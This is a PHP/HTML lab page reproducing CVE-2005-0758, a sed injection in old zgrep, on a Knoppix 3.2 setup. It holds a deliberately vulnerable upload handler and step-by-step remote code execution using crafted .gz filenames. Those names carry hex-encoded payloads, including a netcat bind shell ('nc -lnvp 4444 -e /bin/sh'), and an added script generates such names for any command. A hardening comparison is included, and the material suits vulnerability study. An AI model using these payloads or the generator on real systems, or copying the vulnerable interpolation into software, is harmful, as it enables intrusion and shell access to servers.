a sample of CVE-2005-0758 (sed injection)
Authored by cleemy desu wayo
<!doctype html>
<html lang="en-US">
<head>
<!--
============================================================
a sample of CVE-2005-0758
written by cleemy desu wayo / licensed under CC0
last update: 2023-08-08
============================================================
* try this sample on Knoppix 3.2:
Apache 1.3.27, PHP 4.2.3, and a vulnerable zgrep are all
present on the Knoppix 3.2 Live CD (released in 2003), so
this sample runs there with no extra setup.
* download Knoppix iso:
https://archive.org/details/knoppix-3.2-2003-07-26-en
https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc
* how to run this sample:
1. boot the Knoppix Live CD normally
2. copy this file (cve-2005-0758.php) to /var/www/ on the server
("server" means the Knoppix machine)
3. change owner and chmod (on server)
$ cd /var/www
$ sudo chown www-data:www-data cve-2005-0758.php
$ sudo chmod 600 cve-2005-0758.php
4. start apache (on server)
$ sudo apachectl start
5. from a client machine, open
http://<knoppix>/cve-2005-0758.php
(when Knoppix runs in VirtualBox or similar, the
"client machine" is the host OS)
-->
<title>a sample of CVE-2005-0758 (sed injection)</title>
<style>
body { margin: 0 0 0 0; font-family: Arial;}
h1, h2, h3, form, div, p { margin: 2.2rem 1.2rem 1.2rem 1.4rem; color: #333; }
h1 { margin: 1rem 1.2rem 0.4rem 1.8rem; font-size: 2.1rem; }
h2 { margin: 2.2rem 1.2rem 1.2rem 1.2rem; font-size: 1.6rem; }
h3 { margin: 1.6rem 1.2rem 0.8rem 1.2rem; font-size: 1.1rem; }
p { margin: 0.8rem 1.2rem 0.8rem 1.8rem; }
form, div.fileinfo, div.description {
margin: 2.2rem 2% 1.2rem 2%;
padding: 0 0 2.2rem 0.6rem;
border: 2px solid #ccc;
border-radius: 8px;
}
ul, ol { margin: 0.8rem 1rem 0.9rem 1.2rem; }
ul li { margin: 0.1rem 0 0.1rem 0; }
ol li { margin: 0.8rem 0 0.9rem 0; }
li a { font-size: 0.85rem; }
span.info {
margin-left: 0.8rem;
color: #6666aa;
font-size: 105%;
}
code {
margin: 0.6rem 0 1.2rem 1.2rem;
padding: 0.6rem 0 0.6rem 0.6rem;
display: block;
background-color: #333;
color: #eee;
max-width: 40rem;
line-height: 110%;
}
a { text-decoration: none; }
a:hover { text-decoration: underline; }
footer {
margin: 3rem 0 0 0;
padding: 1.2rem 1rem 1.2rem 1rem;
background-color: #eee;
}
</style>
</head>
<body>
<h1>a sample of CVE-2005-0758</h1>
<p>written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-08</p>
<div class="fileinfo">
<h2>uploaded file information:</h2>
<?
if(empty($_FILES)) {
print('<p>(no file uploaded)</p>');
} else{
$is_gz_str = 'no';
$original_file_basename = basename($_FILES['file']['name']);
$original_file_pathinfo = pathinfo($original_file_basename);
if($original_file_pathinfo['extension'] === 'gz') {
$is_gz_str = 'yes';
// move to ./gz_stored/
move_uploaded_file($_FILES['file']['tmp_name'], './gz_stored/'. $original_file_basename);
// exec zgrep
exec('zgrep CVE gz_stored/*.gz', $search_results);
// save search results
$fp = fopen('./gz_stat/latest-search-result.txt', 'w');
foreach ($search_results as $line) {
fwrite($fp, $line. "\n");
}
fclose($fp);
}
print('<p>file name: <span class="info">'. htmlspecialchars($_FILES['file']['name']). '</span></p>');
print('<p>tmp file name: <span class="info">'. htmlspecialchars($_FILES['file']['tmp_name']). '</span></p>');
print('<p>stored to gz_stored/ directory: <span class="info">'. htmlspecialchars($is_gz_str). '</span></p>');
}
?>
</div>
<form enctype="multipart/form-data" method="post">
<h2>try upload a file:</h2>
<p><input type="file" name="file"></p>
<p><input type="submit"></p>
</form>
<div class="description">
<h2>about CVE-2005-0758</h2>
<p>this is an old (2005) vulnerability in zgrep. in GNU gzip, zgrep is a shell wrapper script: it decompresses each file, pipes it through grep and, when several files are searched, prefixes every matching line with its file name by way of a sed expression of the form "s|^|FILE:|". the file name is spliced into that expression unescaped, so a name containing "|" closes the s command early and everything after it is parsed as further sed commands. the crafted names below rely on GNU sed's "e" command, which runs the rest of the line through the shell.</p>
<ul>
<li>NVD: <a href="https://nvd.nist.gov/vuln/detail/CVE-2005-0758">https://nvd.nist.gov/vuln/detail/CVE-2005-0758</a></li>
<li>gentoo bug tracker: <a href="https://bugs.gentoo.org/90626">https://bugs.gentoo.org/90626</a></li>
<li>before fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2</a></li>
<li>after fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b</a></li>
</ul>
<h2>about sed injection</h2>
<ul>
<li>CWE-74: <a href="https://cwe.mitre.org/data/definitions/74.html">https://cwe.mitre.org/data/definitions/74.html</a></li>
<li>CWE-77: <a href="https://cwe.mitre.org/data/definitions/77.html">https://cwe.mitre.org/data/definitions/77.html</a></li>
<li>CVE-2022-1509: <a href="https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/">https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/</a></li>
</ul>
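<p>The following is an added example, not code from the original sample or from gzip: a minimal shell reconstruction of the zgrep idiom that CVE-2005-0758 abused (a file name spliced unescaped into a sed s||| expression), next to a variant that never hands the name to sed. The crafted name used here only rewrites the output with a second s command, so it runs no external command; with GNU sed the same break-out position takes the "e" command used in the crafted names further down. The function names and the sample grep line are this example's own assumptions.</p>

```shell
#!/bin/sh
# Added demonstration (not part of the original page or of gzip): how an
# unescaped file name inside a sed program becomes sed injection, and a
# prefixing routine that does not involve an interpreter at all.

# Pre-fix zgrep prefixed each matching line with "<file>:" roughly like this.
# The name is interpolated straight into the sed program text, so a '|' in
# the name terminates the s||| command and the remainder is parsed as more
# sed commands ('#' then comments out the trailing ':|').
vuln_sed_script() {            # $1 = file name -> sed program text
    printf 's|^|%s:|' "$1"
}

vuln_prefix() {                # $1 = file name, stdin = grep output
    sed "$(vuln_sed_script "$1")"
}

# Hardened variant: the name is only ever an argument to printf, never part
# of a program, so '|', ';', '#', '&' and '\' in it are printed literally.
safe_prefix() {                # $1 = file name, stdin = grep output
    name=$1
    while IFS= read -r line; do
        printf '%s:%s\n' "$name" "$line"
    done
}

demo() {
    # Constructed crafted name: breaks out of s|^|...| and appends a second
    # s command; it alters the output but executes nothing.
    crafted='|;s|CVE|INJECTED|;#.gz'
    echo 'sed program built from the crafted name:'
    vuln_sed_script "$crafted"; echo
    echo 'vulnerable prefixing (name reaches sed as code):'
    printf 'CVE-2005-0758\n' | vuln_prefix "$crafted"    # constructed grep line
    echo 'hardened prefixing (name stays data):'
    printf 'CVE-2005-0758\n' | safe_prefix "$crafted"
}

demo
```

<p>With an ordinary name such as hoge.txt.gz both functions print "hoge.txt.gz:CVE-2005-0758"; with the crafted name the vulnerable one prints "INJECTED-2005-0758" while the hardened one prints the name verbatim in front of the line. Escaping "|", "&", "\" and newlines before interpolation also closes the hole, but keeping the name out of the program text is the simpler invariant to audit.</p>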
<h2>try this sample on Knoppix 3.2</h2>
<p>Apache 1.3.27, PHP 4.2.3, and a vulnerable zgrep are all present on the Knoppix 3.2 Live CD (released in 2003).</p>
<p>so this sample runs on Knoppix 3.2 with no extra setup.</p>
<h3>download Knoppix iso</h3>
<ul>
<li><a href="https://archive.org/details/knoppix-3.2-2003-07-26-en">https://archive.org/details/knoppix-3.2-2003-07-26-en</a></li>
<li><a href="https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc">https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc</a></li>
</ul>
<h3>try RCE</h3>
<ol>
<li>boot the Knoppix Live CD normally</li>
<li>copy this file (cve-2005-0758.php) to /var/www/ on the server ("server" means the Knoppix machine)</li>
<li>change owner and chmod (on server)<code>$ cd /var/www<br>$ sudo chown www-data:www-data cve-2005-0758.php<br>$ sudo chmod 600 cve-2005-0758.php</code></li>
<li>start apache (on server)<code>$ sudo apachectl start</code></li>
<li>from a client machine, open http://&lt;knoppix&gt;/cve-2005-0758.php<br>(when Knoppix runs in VirtualBox or similar, the "client machine" is the host OS)</li>
<li>create some directories in /var/www (on server)<code>$ cd /var/www<br>$ sudo mkdir gz_stat<br>$ sudo mkdir gz_stored</code></li>
<li>change owner and chmod (on server)<code>$ sudo chown www-data:www-data gz_stat gz_stored<br>$ sudo chmod 707 gz_stat gz_stored<br></code></li>
<li>create an ordinary gz file (on client)<code>$ echo CVE-2005-0758 > hoge.txt<br>$ gzip hoge.txt<br>$ wc -c hoge.txt.gz<br>43 hoge.txt.gz</code></li>
<li>from the client machine, open http://&lt;knoppix&gt;/cve-2005-0758.php and upload hoge.txt.gz</li>
<li>check that the upload succeeded (on server)<code>$ cd /var/www/gz_stored<br>$ sudo wc -c hoge.txt.gz<br> 43 hoge.txt.gz<br>$ cat ../gz_stat/latest-search-result.txt<br>CVE-2005-0758</code></li>
<li>create a new gz file with a crafted filename (on client)<code>$ cp hoge.txt.gz '|;edate;#.gz'</code></li>
<li>open http://&lt;knoppix&gt;/cve-2005-0758.php again and upload the new file</li>
<li>confirm that the date command ran and that the search results are polluted (on server). with two files in the glob, zgrep prefixes each line with its file name, so the crafted name turns the sed expression into "s|^|gz_stored/|;edate;#.gz:|": the prefix becomes "gz_stored/", "edate" executes date, and "#" comments out the rest<code>$ cd /var/www/gz_stat<br>$ cat latest-search-result.txt<br>gz_stored/hoge.txt.gz:CVE-2005-0758<br>Tue Aug 8 14:54:20 CEST 2023<br>gz_stored/CVE-2005-0758</code></li>
<li>delete the file with the crafted name (on server)<br>(not required, but several crafted files on the server get confusing)<br>do NOT delete hoge.txt.gz<code>$ cd /var/www/gz_stored<br>$ sudo rm -rf *'#.gz'</code></li>
</ol>
<h2>crafted filenames examples</h2>
<h3>several commands</h3>
<ul>
<li>several commands can be chained in one name (this only pollutes the search results file):<code>|;edate;whoami;id;#.gz</code></li>
</ul>
<h3>exec xgalaga on server-side</h3>
<ul>
<li>this may not work (xgalaga lives in /usr/games, which is usually not on PATH for www-data, and a file name cannot contain "/", so the full path cannot be written into the name literally):<code>|;exgalaga;#.gz</code></li>
<li>this works (it runs /usr/games/xgalaga: the path is carried as hex, and "echo ...|xxd -r -p|sh" decodes it and feeds it to a shell):<code>|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.gz</code></li>
</ul>
<h3>get a shell (bind shell over netcat)</h3>
<ul>
<li>run 'nc -lnvp 4444 -e /bin/sh' on the server (the hex is that string): it listens on port 4444, so this is a bind shell rather than a reverse shell, and the client connects to the server:<code>|;eecho 6e63202d6c6e76702034343434202d65202f62696e2f73680a|xxd -r -p|sh;#.gz</code></li>
<li>connect to it with netcat from the client machine (192.168.1.3 is the Knoppix address here; the shell runs as www-data)<code>$ nc 192.168.1.3 4444<br>uname -a<br>Linux Knoppix 2.4.21-xfs #1 SMP Fre Jul 25 00:06:47 CEST 2003 i686 GNU/Linux<br>pwd<br>/var/www<br>whoami<br>www-data</code></li>
</ul>
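<p>Added example (not part of the original page): a small shell helper that builds a crafted name of the kind listed above for an arbitrary command, shows the sed program it produces once the sample's "gz_stored/" prefix is in front of it, and checks that the result is still a single path component ending in .gz. The hex detour exists because a file name cannot contain "/", so a command with a path in it cannot be written into the name literally; sed's "e" command runs "echo hex|xxd -r -p|sh", which reconstructs it on the target. The function names are this example's own.</p>

```shell
#!/bin/sh
# Added helper (not from the original page): build crafted zgrep file names
# for CVE-2005-0758 and inspect what they turn into.

# Hex-encode stdin without separators. od is POSIX; the target side decodes
# with xxd -r -p, which is what the names on the page use.
hex_encode() {
    od -An -v -tx1 | tr -d ' \n'
}

# $1 = command to run on the target. A trailing newline is included so that
# sh reads a complete line. The leading '|' closes the s|^|...| command that
# zgrep builds, ';e' executes the rest, and ';#' comments out the ':|' tail.
craft_name() {
    hex=$(printf '%s\n' "$1" | hex_encode)
    printf '|;eecho %s|xxd -r -p|sh;#.gz' "$hex"
}

# $1 = crafted name. The sed program the sample's zgrep call ends up running,
# given that the glob expands to gz_stored/<name>.
sed_program_for() {
    printf 's|^|gz_stored/%s:|' "$1"
}

# Upload preflight: the name must stay one path component (no '/') and keep
# the .gz suffix that the sample's PHP checks before it stores the file.
name_is_uploadable() {
    case $1 in
        */*)  return 1 ;;
        *.gz) return 0 ;;
        *)    return 1 ;;
    esac
}

# Reproduce the two names from the page and show the resulting sed programs.
for cmd in '/usr/games/xgalaga' 'nc -lnvp 4444 -e /bin/sh'; do
    name=$(craft_name "$cmd")
    printf 'command : %s\nname    : %s\nsed prog: %s\n\n' \
        "$cmd" "$name" "$(sed_program_for "$name")"
done
```

<p>Both generated names are byte-for-byte the ones listed above. The check deliberately refuses anything with a slash: the target decodes only what sits inside the name, so any path the payload needs must be inside the hex, not in the name itself.</p>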
</div>
<footer>
<p>written by cleemy desu wayo (
<a href="https://github.com/cleemy-desu-wayo">GitHub</a> -
<a href="https://gitlab.com/cleemy-desu-wayo">GitLab</a> -
<a href="https://huntr.dev/users/cleemy-desu-wayo/">huntr.dev</a> -
<a href="https://note.com/cleemy/">note.com</a>)
</p>
<p>license: CC0</p>
<p>initial release: 2023-08-08</p>
<p>last update: 2023-08-08</p>
</footer>
</body>
</html>